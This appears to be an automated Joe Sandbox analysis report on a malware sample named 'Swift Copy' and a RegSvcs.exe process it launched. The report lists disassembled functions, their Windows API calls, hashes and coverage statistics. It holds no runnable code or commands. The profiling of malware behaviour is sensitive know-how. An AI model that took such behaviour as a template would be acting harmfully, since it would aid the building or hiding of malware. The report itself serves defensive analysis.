,Lk, xrefs: 02338023
,Lk, xrefs: 02338068

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID: ,Lk$,Lk
API String ID: 0-4056530915
Opcode ID: 1e9e53afc05b573293ee1f45c44b0b4161e97a95a299681759db91ee3d10ec9e
Instruction ID: 3ea187342a596f9766332e18752f2c2692f732271a1fbfa17453255331233d2f
Opcode Fuzzy Hash: 1e9e53afc05b573293ee1f45c44b0b4161e97a95a299681759db91ee3d10ec9e
Instruction Fuzzy Hash: 6A82AB75A002298FCB25DF69C884AADBBF2FF88305F15C569E406EB355D734AA41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02338400 Relevance: 1.5, Strings: 1, Instructions: 235COMMON

Download Yara Rule

Strings

`k, xrefs: 0233847D

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID: `k
API String ID: 0-2298430543
Opcode ID: 38fc6979b9b1c0df454b362e8a9e4f9e8b24c225de3e1cb69f91f48ec71887d2
Instruction ID: a7b6d2761378f74b3ee553d872bf421bd26d751b3f88addcc3a612ea27424e5b
Opcode Fuzzy Hash: 38fc6979b9b1c0df454b362e8a9e4f9e8b24c225de3e1cb69f91f48ec71887d2
Instruction Fuzzy Hash: BA816F32F105149FD714DB69DC84A9EB3E3AFC8724F1A8168E409EB765DB34ED018B90

Uniqueness

Uniqueness Score: -1.00%

Function 0233731E Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94750421a9d1aa5c199ca1791ad3666228e1e943ca4bdfabf8f6c6af0fac79a3
Instruction ID: ba67945208fc2faf589fdbbef3a12bd97cd5cd3ed5a62e11ad54f391128afb3a
Opcode Fuzzy Hash: 94750421a9d1aa5c199ca1791ad3666228e1e943ca4bdfabf8f6c6af0fac79a3
Instruction Fuzzy Hash: 54E1B175E012298FDB24DF79D845AADB7F2FF88314F118569D406EB364DB38AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0233736A Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fab57c2be8273b5be59086610a70a1b88a9abb4fe7d732b1a84b4ad3e41768ec
Instruction ID: 9c1a9265fb2859e94b97ca463d8d958d4dea7ef6206a5133401f95fc7ff372b3
Opcode Fuzzy Hash: fab57c2be8273b5be59086610a70a1b88a9abb4fe7d732b1a84b4ad3e41768ec
Instruction Fuzzy Hash: 2BD1AE75A012298FDB24DF79D845AAEB7F2FF88314F118569D405EB364DB38AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02336FF8 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97d4a432d8af6367c0f90eca4dc746ae8c1b6616ffdb0744cf85ac7a2b6b47c3
Instruction ID: e025752cf6932cb603af45dade87f8ca4495e70e00484d933cb20ab3a9d965ab
Opcode Fuzzy Hash: 97d4a432d8af6367c0f90eca4dc746ae8c1b6616ffdb0744cf85ac7a2b6b47c3
Instruction Fuzzy Hash: E98107B8D4010EDFDF14CFA5E485AEEBBB1FB49310F10A659D406EB260DB35AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0233BFFF Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0233C256

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 506c46bdc176653219f1616ce9f49175df5b899821c78a97a6068854a78ddbe9
Instruction ID: e65f22c12c76b65f6be09eb8bfe4013deb67d2877a07a6f31c062cc76c989f2d
Opcode Fuzzy Hash: 506c46bdc176653219f1616ce9f49175df5b899821c78a97a6068854a78ddbe9
Instruction Fuzzy Hash: 288135B0A00B058FD725DF69D45179AB7F1BF88304F108A2ED48ADBA50D775E90ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 049C02F0 Relevance: 1.7, APIs: 1, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,033840F4,023A23AC,?,00000000,?,00000000,00000000), ref: 049C04A7

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: d3f497b6716f4145d35cfd5b04f467eba33e7f8ec1e746b5b87fd3ed06c7c3d5
Instruction ID: 7dadec59989884c3e2bf242ea9703e9ff6d21bd777cf0a6e1624f3d6e69aa618
Opcode Fuzzy Hash: d3f497b6716f4145d35cfd5b04f467eba33e7f8ec1e746b5b87fd3ed06c7c3d5
Instruction Fuzzy Hash: 5B519F303006108FD729DB69C855B2E77EBAFC5B14F14806DE005CB3A1CB75ED428BA1

Uniqueness

Uniqueness Score: -1.00%

Function 049C1F34 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049C2B8A

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 624551291465152ddccb80d45f7453034e353f48e914d81849b452943b551232
Instruction ID: 708508c238b64a396998484505e8819f358ca448f510d030f684adec23b0deda
Opcode Fuzzy Hash: 624551291465152ddccb80d45f7453034e353f48e914d81849b452943b551232
Instruction Fuzzy Hash: 2D51B1B1D003099FDB14CF99C884ADEBBB5FF48314F24856EE419AB250D774A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 049C2A6C Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049C2B8A

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f64b8a54c2a5691d6427661923424370408bc0445ebda1042fff64ecdfdce3d8
Instruction ID: a626fcc3debef8704cdfda5d34c74a1e32957b9ed35010ebbdaf4f19b8045769
Opcode Fuzzy Hash: f64b8a54c2a5691d6427661923424370408bc0445ebda1042fff64ecdfdce3d8
Instruction Fuzzy Hash: 5051C1B1D00309DFDB14CF99D884ADEBBB5FF88314F24852AE419AB210D774A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02335345 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02335401

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 804af32e6fc275173a610a1607936d38fd261623cad82ab6cf16241a86bda4fc
Instruction ID: 30f9cedf9c4c417f80f9a0efe432d92271d7ba827769f1fe17f4173e7676c4b9
Opcode Fuzzy Hash: 804af32e6fc275173a610a1607936d38fd261623cad82ab6cf16241a86bda4fc
Instruction Fuzzy Hash: 4641E271D002188FDB25CFA9C984BCDBBB5FF88318F248069D408BB651DB755A4ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 049C2084 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 049C50F1

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 01b0f6ebc5f5d925d9c58bc2cce8f69f93f505aa64dc2cea97f93595268dc459
Instruction ID: 0823d11475421ba85a32fa7278172056a7aa658fd55c0e83f027edca7f8597b0
Opcode Fuzzy Hash: 01b0f6ebc5f5d925d9c58bc2cce8f69f93f505aa64dc2cea97f93595268dc459
Instruction Fuzzy Hash: 754108B4A003159FDB14CF99C488AAABBF5FB88324F25846DD419A7321D735F845CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02333EA0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02335401

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b6ad9c7f3cbfe940230675dd9ddec3f06e5d6a656957a745d3f0f2be38f973be
Instruction ID: 4f85b696ae4088035bfb3f2b411f1b76ef47d75a43bb9d95df898ac094cba74e
Opcode Fuzzy Hash: b6ad9c7f3cbfe940230675dd9ddec3f06e5d6a656957a745d3f0f2be38f973be
Instruction Fuzzy Hash: 9441EF71D00618CBDB25CFA9C844BCEBBB5BF88318F248069D408BB655DB756A49CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0233E530 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0233E4FE,?,?,?,?,?), ref: 0233E5BF

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 03251262c9c31cd993c0b92ab18c13183b6e6cd94e2adbe98c36f5032afac6cd
Instruction ID: 1d9bd58b6d65dca1b6fb94f6dc422616d1fb6759a91737161c820bc9a5425028
Opcode Fuzzy Hash: 03251262c9c31cd993c0b92ab18c13183b6e6cd94e2adbe98c36f5032afac6cd
Instruction Fuzzy Hash: 312116B5901209AFDB10CF99D884ADEBFF4EF48324F14841AE814B7710D378A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0233E0A4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0233E4FE,?,?,?,?,?), ref: 0233E5BF

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 516647e1db17b1dcc991a99474dc8ad357a17762ef38d59ffbccf01cc6657cc9
Instruction ID: d380347eb0930d37430e21aab0cc4b262138f8218a72ab99812260a39ef8df7d
Opcode Fuzzy Hash: 516647e1db17b1dcc991a99474dc8ad357a17762ef38d59ffbccf01cc6657cc9
Instruction Fuzzy Hash: 1221E5B5900208AFDB10CF99D584ADEBBF4EF48324F14846AE915B7710D374AA54CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0233C471 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0233C2D1,00000800,00000000,00000000), ref: 0233C4E2

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d65e700a25b7a0eb7dbe662118f93f09c8ad3646f5d2e6c923f8436e0798d89d
Instruction ID: 8e4c1ee384c487e1cb424547f2aec9056d2dab1e683ceb6efa0486e7aa3476e4
Opcode Fuzzy Hash: d65e700a25b7a0eb7dbe662118f93f09c8ad3646f5d2e6c923f8436e0798d89d
Instruction Fuzzy Hash: 071114B6D002099FDB11CF9AD444BDEFBF4EB88324F14842AD419B7610D379A645CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233BA00 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0233C2D1,00000800,00000000,00000000), ref: 0233C4E2

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a854fa97ba067480307a27ba21292b4cb3bc18262a87c0494e043a3e8328f3f7
Instruction ID: fdb759f2690d29e7ee7d4dea98fe177178ddaaf554136afe084ef8f6051e7c08
Opcode Fuzzy Hash: a854fa97ba067480307a27ba21292b4cb3bc18262a87c0494e043a3e8328f3f7
Instruction Fuzzy Hash: B81114B69002099FDB11CF9AD444BEEFBF4EB88324F14892EE459B7610C374A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 049C2CB8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,049C2CA8,?,?,?,?), ref: 049C2D1D

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: fb99c209e06aaa77ff4b8abda7130cb49d77ae099027bf50b154cd61534079d9
Instruction ID: a593ae9d37a256a3e0ca1d5c9ca1cf5688dd2920a27cac8344f75ad43e3efa9a
Opcode Fuzzy Hash: fb99c209e06aaa77ff4b8abda7130cb49d77ae099027bf50b154cd61534079d9
Instruction Fuzzy Hash: 4E1133B59002099FDB10DF99D885BDEFBF8EF88320F24841AD858A7740C378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 049C1F6C Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,049C2CA8,?,?,?,?), ref: 049C2D1D

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5f21db3fc15aa26ed8947e4a99758ebfaf9324a32e622029162ca460810f1d8c
Instruction ID: 9dddba60b9278a357b9ead8a0a72e5739b73e55c9cb2a7aacb738adec5a87697
Opcode Fuzzy Hash: 5f21db3fc15aa26ed8947e4a99758ebfaf9324a32e622029162ca460810f1d8c
Instruction Fuzzy Hash: 5B1136B58003089FDB10DF89D584BDEBBF8EB48320F20846AD855B7700C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0233C1F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0233C256

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3d0bb1a3e05daccdda657ca2f1f767a318cd151604111b76ac6f0ef051f8ae70
Instruction ID: a8ff8e987a73c4ed765ee1d4865408edc5724ce6003f1e9e167d401a493cbceb
Opcode Fuzzy Hash: 3d0bb1a3e05daccdda657ca2f1f767a318cd151604111b76ac6f0ef051f8ae70
Instruction Fuzzy Hash: 3B11D2B6D002498FCB10DF9AD444BDEFBF4AF88624F14852AD859B7610C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02338728 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

, xrefs: 0233883E

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 321cd0993135ce777f569eaaebfbd0fb6aa6ae7a0c59bf82d30b4d3dc11baa86
Instruction ID: ef1ce6da6c6ada24b1b79e1a7236590a67cccd9c1de4731967d7db00ca67fca5
Opcode Fuzzy Hash: 321cd0993135ce777f569eaaebfbd0fb6aa6ae7a0c59bf82d30b4d3dc11baa86
Instruction Fuzzy Hash: FD41AF71F0011A8FCB14CBA9C8816AEF7B2FFC4215B14C57AE204DB749D734E9568B91

Uniqueness

Uniqueness Score: -1.00%

Function 049C0F00 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfebe1a9134e5dbcb3215b89d1aa2b23422a28e9adb38bb8260368e143c264c
Instruction ID: fec93423698bc39ee9868132ccb83a93e844a1734f401e25c828cf6b1e17ae98
Opcode Fuzzy Hash: 0dfebe1a9134e5dbcb3215b89d1aa2b23422a28e9adb38bb8260368e143c264c
Instruction Fuzzy Hash: BC12B5F1C917468AD312CF65E49C2893BBCB745328FD0CB28D2A15BAD0D7BA116ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 049C0548 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba15f8647a6594c2fe3f7061e95a92756611b6bd0085ad192df6227c014b17e6
Instruction ID: d8318586d95e4566f6856d24c8c64bd3c6efd84e90479b7a3212a8d879358dd0
Opcode Fuzzy Hash: ba15f8647a6594c2fe3f7061e95a92756611b6bd0085ad192df6227c014b17e6
Instruction Fuzzy Hash: D6A14832E0021ACFCF15DFA5C9449DEBBF6BF85300B15856AE905BB261EB31A955CF80

Uniqueness

Uniqueness Score: -1.00%

Function 049C0EF0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.290147747.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49c0000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae693c2ca11bbd3cb8cb3a5e07859ee6013aa3f6f4c5706d4d94ac87c8bef5e
Instruction ID: c46bda92bc42813a94b06db377b05368dc951e8aa229fe812ac757584ef5c989
Opcode Fuzzy Hash: bae693c2ca11bbd3cb8cb3a5e07859ee6013aa3f6f4c5706d4d94ac87c8bef5e
Instruction Fuzzy Hash: 8BC129F1C917468AD711CF25E88C2893BBDFB85328F90CB28D1A16B6D0D7B9116ACF54

Uniqueness

Uniqueness Score: -1.00%

Function 023384A1 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.283919727.0000000002330000.00000040.00000800.00020000.00000000.sdmp, Offset: 02330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2330000_Swift Copy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bebc3fef562b39415b54e62afa904e626c26ef8db2bab7b571e158144162df6
Instruction ID: 076eec4b478eef56b742c6cedc373e1f1c59113505d3e141ec031742150e079b
Opcode Fuzzy Hash: 3bebc3fef562b39415b54e62afa904e626c26ef8db2bab7b571e158144162df6
Instruction Fuzzy Hash: 2D615E32F205249FD714DB69DC80B9EB3E3AFC4724F1A8164E419AB765DB34ED018B90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 4200, Parent PID: 1740COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	53.3%
Total number of Nodes:	1817
Total number of Limit Nodes:	76

Executed Functions

Function 019099A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019099AA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 188740bb10c8bdd9704e036ca326b35bbc3f347c331ba9359892aef1fd370193
Instruction ID: 6befce72e1a005e1151178349126a6027a2e905308c48b8b816d39ecbad1cd29
Opcode Fuzzy Hash: 188740bb10c8bdd9704e036ca326b35bbc3f347c331ba9359892aef1fd370193
Instruction Fuzzy Hash: 7F9002A174111842D10061994518B064485E7E1341F51C415E1094554DC659CC927166

Uniqueness

Uniqueness Score: -1.00%

Function 01909910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190991A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4c99b3aedc13f93d0f1eed9aa9e330989ff3a57bdabfab2632bdfedfa9f4c79
Instruction ID: 4ed4b2e696e3b054347c36bb4e5e6aa93e30e73566c12926017605af8c7265fa
Opcode Fuzzy Hash: b4c99b3aedc13f93d0f1eed9aa9e330989ff3a57bdabfab2632bdfedfa9f4c79
Instruction Fuzzy Hash: DC9002B160111802D140719945087464485A7D0341F51C411A5094554EC6998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 019098F0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 019098FA

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a12fc05de551f4da9905f24f62c7bb164c7bb12bdf5a0f58fb3c93a33b4a69b
Instruction ID: 18c9dbb1e655e823f4f99a05ba59f6bc5252faa6e4457a646c20920b1ce9e474
Opcode Fuzzy Hash: 2a12fc05de551f4da9905f24f62c7bb164c7bb12bdf5a0f58fb3c93a33b4a69b
Instruction Fuzzy Hash: F6900261A0111902D10171994508616448AA7D0281F91C422A1054555ECA6589D2B171

Uniqueness

Uniqueness Score: -1.00%

Function 01909840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190984A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 171543a8cffdea43c9b8d27b9f48bb6d9f1c9931bd3ad07a5e5ef50ad58c1166
Instruction ID: 1b399d0248980794ec1511d5047d54b9f34999ac7b11149df8e44032074c1c3b
Opcode Fuzzy Hash: 171543a8cffdea43c9b8d27b9f48bb6d9f1c9931bd3ad07a5e5ef50ad58c1166
Instruction Fuzzy Hash: 28900261642155525545B19945085078486B7E0281791C412A1444950CC5669896E661

Uniqueness

Uniqueness Score: -1.00%

Function 01909860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0190986A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6b5dadd9516d9fffd5aea47656bf13c3099382c014c0d6aec93a133c690fb7b3
Instruction ID: ad43b1f36d1876544874a0b64382f150e3ab1c3010645c310fae1799de04f18f
Opcode Fuzzy Hash: 6b5dadd9516d9fffd5aea47656bf13c3099382c014c0d6aec93a133c690fb7b3
Instruction Fuzzy Hash: 1A90027160111813D111619946087074489A7D0281F91C812A0454558DD6968992B161

Uniqueness

Uniqueness Score: -1.00%

Function 01909A00 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01909A0A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f09b446c70e9a5dfd98f57298289482b3c579f24b67d227c3af6d1883487143
